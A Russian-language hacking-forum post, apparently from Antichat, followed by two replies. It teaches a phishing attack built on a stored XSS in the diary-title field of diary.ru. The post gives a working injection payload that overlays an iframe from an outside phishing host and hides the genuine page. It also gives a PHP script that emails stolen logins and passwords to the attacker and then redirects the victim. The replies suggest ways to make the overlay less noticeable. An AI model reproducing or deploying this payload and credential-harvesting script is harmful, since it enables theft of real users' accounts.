Добрый вечер, с вами XenOtai. Если вы внимательно следите за темой активных хсс, то наверняка видели найденную мной активку на diary.ru. Напомню, что находится она в названии дневника. Положим, вы украли куки, но Вам хочется большего. То есть пароля. Но что, если он сложный и расшифровать его не удалось? Тогда первый выход, который приходит в голову – фишинг. Сделать фальшивую авторизацию, и как только чел зайдёт на свой дневник, его переадресует на сделанную нами форму. Одна проблемка – адрес-то в адресной строке сменится на другой, пусть и похожий. Вы наверняка задавались вопросом, как же этого можно избежать. Итак, заходим на дайри. Вбиваем <xss> в название дневника, бежим смотреть исходник – действительно, фильтрации 0. При этом наш тег выводится в параметре title: Code: <title>@дневники — <xss></title> Итак, что нам надо осуществить? Нам нужно: А) Фрейм в теле страницы. Б) Скрыть всё лишнее. Как скрыть лишнее? Оч просто: Code: <body style="visibility:hidden;"> Так как даже если посередине страницы поставить </body></html>, браузер всё равно отображает дальше, но учитывает параметры, различные в каждом теге, то наш стиль прекрасненько отобразиться! Теперь фрейм! Обычный фрейм не годится, поскольку он исчезнет вместе с боди, нам нужен iframe. Итак, финальный код: HTML: </title><iframe src=http://fuckinghack.ru/auth.html location=top width="1003" height="1800" hspace=0 vspace=0><body style="visibility:hidden;"> Подбираем ширину и высоту по нашей нужде, фрейм отображает страницу, которая отошлёт данные нашему скрипту, который, обработав их, отошлёт на нашу почту. Для тех, кто в танке, код скрипта (кто-то выкладывал на ачате ): PHP: <? $to = "[email protected]" . ", " ; //ваше мыло $subject = "Заход на diary.ru через ваш фейк"; //тема сообщения $message = "Через ваш фейк на мыло зашли Login: $login Password: $passwd"; //само сообщение. Если хотите изменить, то только верхнюю строчку. $otpravitel = "M@IL Corp <[email protected]>"; $headers = "MIME-Version: 1.0"; $headers .= "Content-type: text/$tipe; charset=windows-1251"; $headers .= "From: $otpravitel"; mail($to, $subject, $message, $headers); //отправляем сообщение header("Location: http://diary.ru"); //при правильном вводе пароля жертва будет переадресовываться на дайри, как будто ничего не было (хорошо бы устроить переадресацию на какой-нибудь дневник, потому что адресная строка останется прежней), но вам отправится пароль exit; ?> Чего мы достигли: Фейк на дневнике, с адресом дневника. Пример (оптимизировано под 1024х768): Code: http://diary.ru/~roboboy/ «Удачи мне надо бежать а то я всю ночь не спал то что говорит что я убежал спать». (с) Dracula4ever XenOtai special for Antichat.ru
Мдя... совсем для новичков, хотя это то же цель благородная... есть для энтих целей и более красивые методы... читай статьи на ачате... но мах репы поставлю, для начинающих мож быть полезно (увеличивает активность мозга)
все вроде нормально только убери скролл а то сильно палится.. + до того можно через жаба скрипт получать разрешение экрана и делать фрейм на всю страницу тогда не будет трабл с пользовательскими разрешениями
